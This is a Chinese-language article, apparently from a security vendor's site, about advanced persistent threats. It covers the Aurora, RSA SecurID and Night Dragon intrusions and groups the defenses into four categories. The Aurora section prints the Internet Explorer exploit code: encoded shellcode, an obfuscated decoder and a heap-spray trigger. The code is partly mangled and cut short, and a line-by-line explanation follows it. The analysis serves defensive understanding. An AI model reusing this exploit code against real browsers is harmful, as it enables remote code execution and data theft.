APT攻击案例分析 - APT防御产品

APT攻击案例分析

RSA执行总裁ArtCoviello在2011年3月15日称,RSA遭到黑客攻击,获取认证的SecurID相关信息被窃取。而这只是麻烦的开始。在这起数据泄露事件中,黑客随后攻击了RSA客户,包括洛克希德马丁公司。Coviello的声明让高级持续性威胁(APT)成为了一个流行词汇。 
APT一词最初由美国空军使用,现在演变为专指对网络不间断的攻击行为。RSA的数据泄露在去年第二季度为其母公司EMC带来了5500万美元的损失。 
APT在2011年全面爆发。挪威国家安全局在11月称,石油、天然气和防务公司已经成为了这一复杂攻击的目标,这些公司的行业秘密和机密合同谈判等信息均遭到了窃取。据称,有10家挪威公司遭到了带有病毒的特制邮件的攻击,而邮件中的病毒却不会触发反恶意软件探测系统。这样的案例还有愈演愈烈之势。人们不禁要问,APT 是什么?能有如此巨大的破坏力?我们应该如何对付它? 2  APT攻击介绍 
本部分主要对APT攻击的定义、攻击特点、攻击基本原理做比价详细的介绍。 2.1  APT简介 
APT(Advanced Persistent Threat),高级持续威胁,它是组织(特别是政府)或者小团体利用先进的计算机网络攻击手段对特定高价值数据目标进行长期持续
性网络侵害的攻击形式。 

APT攻击具有以下特点:

 1、 针对特定的政府或企业为攻击目标,长时间地进行有计划、有组织的网络攻击,以获取极具价值的情报信息。 

2、 APT攻击具有“先进”、“智能化”特征,当它的一种攻击方法不能奏效时,就会尝试采用另一种攻击方法,直至达到预定攻击效果。 
3、 APT的另一特点是持续且隐蔽,能长期潜伏,具有一定的反侦测能力,因此人们往往会被其低调而缓慢的行动所迷惑,以致遭受巨大损失后才有所顿悟。 
在APT攻击中,攻击者会花几个月甚至更长的时间对"目标"网络进行踩点,针对性地进行信息收集,目标网络环境探测,线上服务器分布情况,应用程序的弱点分析,了解业务状况,员工信息等等。当攻击者收集到足够的信息时,就会对目标网络发起攻击,我们需要了解的是,这种攻击具有明确的目的性与针对性。发起攻击前,攻击者通常会精心设计攻击计划,与此同时,攻击者会根据收集到的信息对目标网络进行深入的分析与研究,所以,这种攻击的成功率很高。当然,它的危害也不言而喻。 2.2  APT攻击原理 
APT攻击的原理相对于其他常见的网络攻击形式更为高级和先进,其高级性主要体现在APT在发动攻击之前,需要对攻击对象的业务流程和目标系统进行精确的情报收集,在收集过程中,攻击者会主动挖掘被攻击对象受信系统和应用程序的漏洞,在这些漏洞的基础上形成攻击者所需的C&C网络,此种行为没有采取任何可能触发警报或者引起怀疑的行动,因此更接近于融入被攻击者的系统或程序。有人甚至认为;APT攻击是各种社会工程学攻击与各类0day漏洞利用的综合体。 

典型的APT攻击,通常会通过如下途径入侵到您的网络当中:

1、 通过SQL注入等攻击手段突破面向外网的Web Server; 

2、 通过被入侵的Web Server做跳板,对内网的其他服务器或桌面终端进行
扫描,并为进一步入侵做准备; 
3、 通过密码爆破或者发送欺诈邮件,获取管理员帐号,并最终突破AD服
务器或核心开发环境; 
4、 被攻击者的私人邮箱自动发送邮件副本给攻击者; 
5、 通过植入恶意软件,如木马、后门、Downloader等恶意软件,回传大量
的敏感文件(WORD、PPT、PDF、CAD文件等); 
6、 通过高层主管邮件,发送带有恶意程序的附件,诱骗员工点击并入侵内
网终端。 
下图说明了一次典型的APT攻击过程: 
 12.PNG
Figure 1 典型的APT攻击过程 
为什么Web Server会成为攻击者发起APT攻击起点?通常这里是公司邮件网络的集散地,这也验证了EMAIL电子邮件已沦为APT攻击最重要的途径之一,而且EMAIL中包含的各类重要信息更可能带来意想不到的收获。前面我们说到,攻击者攻击Web Server的主要目的是为了充当进一步入侵的跳板,因此针对EMAIL的攻击行为通常会执行如下工作: 

发送钓鱼邮件:窃取用户ID与密码; 
执行恶意脚本:扫描终端用户使用环境,发掘可利用的攻击资源; 
植入恶意软件:针对用户环境中应用程序漏洞,注入恶意代码,构建僵尸网络。 
在针对邮件系统的APT攻击的过程中,攻击者通常会利用各种办公系统所支持的各类文档0day,例如WORD、PDF、PPT等,越是频繁使用的文档,越有可能降低用户安全意识。 3  APT攻击典型案例 
本部分主要对近几年发生的典型APT攻击案例进行介绍。 3.1 极光行动 
极光行动(Operation Aurora)或欧若拉行动是2010年中旬可能源自中国的一场网络攻击,其名称“Aurora”(意为极光、欧若拉)来自攻击者电脑上恶意文件所在路径的一部分。遭受攻击的除了Google外,还有20多家公司:其中包括Adobe Systems、Juniper Networks、Rackspace、雅虎、赛门铁克、诺斯洛普·格鲁门和陶氏化工。 
Google Aurora(极光)攻击是一个十分著名的APT攻击。Google内部终端被未知恶意程序渗入数月,攻击者持续监听并最终获成功渗透进入Google的邮件服务器,进而不断的获取特定Gmail账户的邮件内容信息,并且造成各种系统的数据被窃取。 3.1.1 攻击过程回放 
1、 搜集Google员工在Facebook、Twitter等社交网站上发布的信息;  2、 利用动态DNS供应商建立托管伪造照片网站的Web服务器,Google员工收到来自信任的人发来的网络链接并且点击,含有shellcode的JavaScript造成IE浏览器溢出,远程下载并运行程序;  
3、 通过SSL安全隧道与受害人机器建立连接,持续监听并最终获得该雇员
访问Google服务器的账号密码等信息; 
4、 使用该雇员的凭证成功渗透进入Google邮件服务器,进而不断获取特定Gmail账户的邮件内容信息。 3.1.2 代码分析 
一般说来,要直接进攻Google的主搜索服务器,不太可能,因为那里的安全做得很好。所以选择攻击内网用户,因为内网的安全一般要小一些。正好采用IE的漏洞。 
攻击代码为: 
<html><script>var sc = unescape(" 
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2…. 
var sss = Array(826,679,798,224,770,427,819,770,707,805,693,679,784,707,280,238,259,819,336,693,336,700,259,819,336,693,336,700,238,287,413,224,833,728,735,756,707,280,770,322,756,707,770,721,812,728,420,427,371,350,364,350,392,392,287,224,770,301,427,770,413,224,770,427,770,322,805,819,686,805,812,798,735,770,721,280,336,448,371,350,364,350,378,399,315,805,693,322,756,707,770,721,812,728,287,413,826,679,798,224,840,427,770,707,833,224,455,798,798,679,847,280,287,413,224,714,777,798,280,826,679,798,224,735,427,336,413,735,420,350,336,336,413,735,301,301,287,224,861,840,637,735,651,427,770,301,805,693,413,875); 
var arr = new Array; 
for (var i = 0; i < sss.length; i ++ ){ 
arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g,""); cc = cc.replace(/@/g,","); 
(cc); 
var x1 = new Array(); for (i = 0; i < 200; i ++ ){ 
x1[i] = document.createElement_x_x("COMMENT"); x1[i].data = "abc"; }; 
var e1 = null; 
function ev1(evt){ 
e1 = document.createEventObject(evt); 
document.getElementByIdx("sp1").innerHTML = ""; window.setInterval(ev2,50); } 
function ev2(){ p = " 
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d"; 
for (i = 0; i < x1.length; i ++ ){x1[i].data = p;}; var t = e1.srcElement;} 
</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html> 
下面再分析一下攻击开始时让IE溢出的代码。 
1、 sc字符串,这个字符串后面跟着一个unescape(“xxxxxxxxxxxxxxx”)的函数,其中的字符串是通过Escape()函数进行加密后的字符串,使用unescape进行解密,是使它不易被杀毒软件发现吧; 
2、sss 整形数组,这是个将一段特殊代码编译后生成的二进制码,例如 Mov al,07  Cmp al,bl。等这些就对应一些二进制码,即一串二进制数。其中这部分代码就是上面的步骤2中的功能代码。即打开ftp程序,下载远程有问题的程序; 
3、生成一个arr数组; 
4、对每一个sss的值,生成一个字符串放进arr,arr[i] = String. fromCharCode(sss[i]/7); 
5、将arr连成一个大字符串; 
6、再替换掉arr中的@,g字符为逗号,cc = cc.replace(/@/g,","); 
7、执行arr中的代码(cc);//函数可以执行其中的代码; 
8、再生成一个数组x1,向x1中生成200个document,(它可以生成html文档),其中属性为”COMMENT”,值为”abc”,定义一个e1,值为null; 
9、函数ev1(evt),它会为文档创建事务对象,并50毫秒调用ev2一次函数; 10、 ev2函数。它先定义了一个p字符串,其中都是\u0c0d的样子,一共32个,然后将它存在x1的数据中,然后再定义一个变量t,将上ev1生成的事件的引用给它; 
11. 最后关键一句的事件触发。</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"> </span> </body></html>。 
其中的”sp”,即上面的热点区,而图片为aaa.gif,后面的onload=”ev1(event),表明加载时便会执行上面的ev1,ev2函数,而ev1,ev2上面的代码是待使用的数据。 
主要的思路是在ev2定义的p字符串,与x1数组,x1数组有200上,p字符也很长,当每隔50秒执行ev2时,会溢出,再返回时就执行到事先设定好的执行代码上了,而这段代码就上上面的SC,至于为什么刚好执行到上面,那是因为,p字符串的长度被设计得刚好,会刚好将代码滑向SC,而在滑动的过程中,因为p中全是空指令,而不会发生异常。SC执行后,可能会开ftp下载,或者以某种方式将真正的有毒程序下载下来,而不被发觉,一旦下载下来后,就被监控了。于是内网就很容易地被控制了,就可以拿到登录搜索服务器的用户名,密码及其他有用信息。 3.2 RSA SecurID窃取攻击 
2011年3月,EMC公司下属的RSA公司遭受入侵,部分SecurID技术及客户资料被窃取。其后果导致很多使用SecurID作为认证凭据建立VPN网络的公司受到攻击,重要资料被窃取。在伦敦举行的2011年RSA欧洲大会上,RSA执行主席Art Coviello表示,调查显示,RSA攻击是由一个国家(主要是因为攻击的复杂性)支持的,不过他表示该调查信息不允许他说出背后的国家。 
攻击过程回放: 
1、攻击者给RSA的母公司EMC的4名员工发送了两组恶意邮件,附件名为“2011 Recruitment plan.xls”;  
2、在拿到SecurID信息后,攻击者开始对使用SecurID的公司展开进一步攻击。  
3、其中一位员工将其从垃圾邮件中取出来阅读,被当时最新的Adobe Flash的0day漏洞(CVE-2011-0609)命中;  
4、该员工电脑被植入木马,开始从BotNet的C&C服务器下载指令执行任务;  5、首批受害的使用者并非“位高权重”人物,紧接着相关联的人士包括IT与非IT等服务器管理员相继被黑;  
6、RSA发现开发用服务器(Staging server)遭入侵,攻击方立即撤离,加密并压缩所有资料并以FTP传送至远程主机,随后清除入侵痕迹。 
 Figure 2 那封原始邮件 

3.3 夜龙攻击 

据美国《华尔街日报》2011.2.10报道,美国网络安全公司McAfee发表报告称,5家西方跨国能源公司遭到“来自中国”的黑客“有组织、隐蔽、有针对性”的攻击。超过千兆字节的敏感文件被窃,包括油气田操作的机密信息、项目融资与投标文件等。McAfee的报告称这场网络间谍行动代号为“龙”(NightDragon),
最早可能开始于2007年,目前攻击行动仍在持续。 
攻击过程如下: 
1、通过SQL注入,入侵外网Web服务器; 
2、以Web服务器为跳板,对内网其他服务器及终端电脑进行扫描; 3、通过密码暴力破解等方式入侵内网AD服务器及开发人员电脑; 4、向被入侵电脑植入恶意代码,并安装远端控制工具; 
5、禁用被入侵电脑的IE代理设臵,建立直连通道,传回大量机敏文件(包括所有会议记录与组织人事架构图); 
6、更多内网电脑遭到入侵,多半为高阶主管点击了看似正常的邮件附件,却不知其中含有恶意代码。 
 
Figure 3 攻击步骤示意图 
3.4  APT攻击防范策略 
在2013年的全球RSA大会上,APT防范再次成为热点议题。在APT防范领域,国内外厂商也展出了最优秀的APT解决方案,他们的防范策略和解决方案可以概括为四类: 
1、主机文件保护类:不管攻击者通过何种渠道执行攻击文件,必须在员工
的个人电脑上执行。因此,能够确保终端电脑的安全则可以有效防止APT攻击。主要思路是采用白名单方法来控制个人主机上应用程序的加载和执行情况,从而防止恶意代码在员工电脑上执行。很多做终端安全的厂商就是从这个角度入手来制定APT攻击防御方案,典型代表厂商包括国内的金山网络和国外的Bit9。 
2、大数据分析检测APT类:该类APT攻击检测方案并不重点检测APT攻击中的某个步骤,而是通过搭建企业内部的可信文件知识库,全面收集重要终端和服务器上的文件信息,在发现APT攻击的蛛丝马迹后,通过全面分析海量数据,杜绝APT攻击的发生,采用这类技术的典型厂商是RSA。 
3、恶意代码检测类:该类APT解决方案其实就是检测APT攻击过程中的恶意代码传播步骤,因为大多数APT攻击都是采用恶意代码来攻击员工个人电脑以进入目标网络,因此,恶意代码的检测至关重要。很多做恶意代码检测的安全厂商就是从恶意代码检测入手来制定APT攻击检测和防御方案的,典型代表厂商包括FireEye。 
4、网络入侵检测类:就是通过网络边界处的入侵检测系统来检测APT攻击的命令和控制通道。虽然APT攻击中的恶意代码变种很多,但是,恶意代码网络通信的命令和控制通信模式并不经常变化,因此,可以采用传统入侵检测方法来检测APT通信通道。典型代表厂商有飞塔。 3.5 结束语 
APT攻击是近年流行的杀伤力很大,并且很难防御的一种攻击模式,是一类特定的攻击,为了获取某个组织甚至是国家的重要信息,有针对性的进行的一系列攻击行为的整个过程。主要就针对企业的商业机密信息和国家重要的基础设施进行,包括能源、电力、金融、国防等关系到国计民生,或者是国家核心利益的网络基础设施。 
对于这些单位而言,尽管已经部署了相对完备的纵深安全防御体系,可能既包括针对某个安全威胁的安全设备,也包括了将各种单一安全设备串联起来的管理平台,而防御体系也可能已经涵盖了事前、事中和事后等各个阶段。但是,这样的防御体系仍然难以有效防止来自互联网的入侵和攻击,以及信息窃取,尤其
是新型APT攻击。  
希望相关企业和政府能够重视APT攻击的危害性,尽快给出合理的应对措施,以免社会受到更大的损失。


转载请注明出处 APT防御产品 » APT攻击案例分析

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址